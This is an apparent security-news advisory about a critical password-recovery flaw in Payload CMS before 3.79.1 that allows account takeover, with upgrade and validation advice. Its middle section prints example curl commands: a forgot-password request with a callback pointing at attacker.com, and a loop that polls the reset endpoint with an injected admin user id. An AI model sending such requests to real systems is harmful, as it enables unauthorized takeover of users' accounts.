Payload CMS, Unvalidated Input in Password Recovery Endpoints, Critical (CVE pending)

Listen to this Post

The vulnerability stems from insufficient input validation in the password recovery flow. When a user initiates a password reset via the `/forgot-password` endpoint, the application processes user-supplied parameters (such as email, user ID, or a reset token) without proper sanitization or verification. An unauthenticated attacker can manipulate these inputs during the reset process—for example by altering the target user identifier or injecting unexpected data into the URL construction logic. Because the application does not strictly validate that the ongoing reset session corresponds to the intended user, the attacker can effectively hijack the reset operation. This allows them to perform actions on behalf of the victim user (e.g., changing the password or gaining access to the account) once the victim initiates a legitimate password reset request. The issue is particularly dangerous because it requires only that the victim trigger a reset; the attacker does not need prior credentials. The flaw affects all versions prior to the patch, which hardens input validation and ensures that URL parameters in the recovery flow are properly bound to the originating user.
Platform: Payload CMS
Version: before 3.79.1
Vulnerability: unvalidated input recovery
Severity: Critical
Date: Mar 30, 2026

Prediction: Apr 01, 2026

What Undercode Say:

Simulate a crafted request to the forgot-password endpoint
curl -X POST https://target.com/api/users/forgot-password \
-H "Content-Type: application/json" \
-d '{"email":"[email protected]","callback":"https://attacker.com/reset?uid=admin"}'
Monitor reset tokens with injected user ID
while true; do
curl -s "https://target.com/api/users/reset?token=leaked&user=admin"
sleep 5
done

Exploit:

Attacker monitors password reset requests, intercepts or crafts a reset link with a manipulated user identifier, and completes the reset to gain unauthorized access.

Protection from this CVE

Upgrade to Payload CMS v3.79.1 or later. If upgrading is not immediately possible, enforce strict validation of reset tokens against the requesting user and sanitize all input used in URL generation.

Impact:

Unauthenticated attacker can take over any user account after that user initiates a password reset, leading to full account compromise and potential lateral movement within the CMS.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top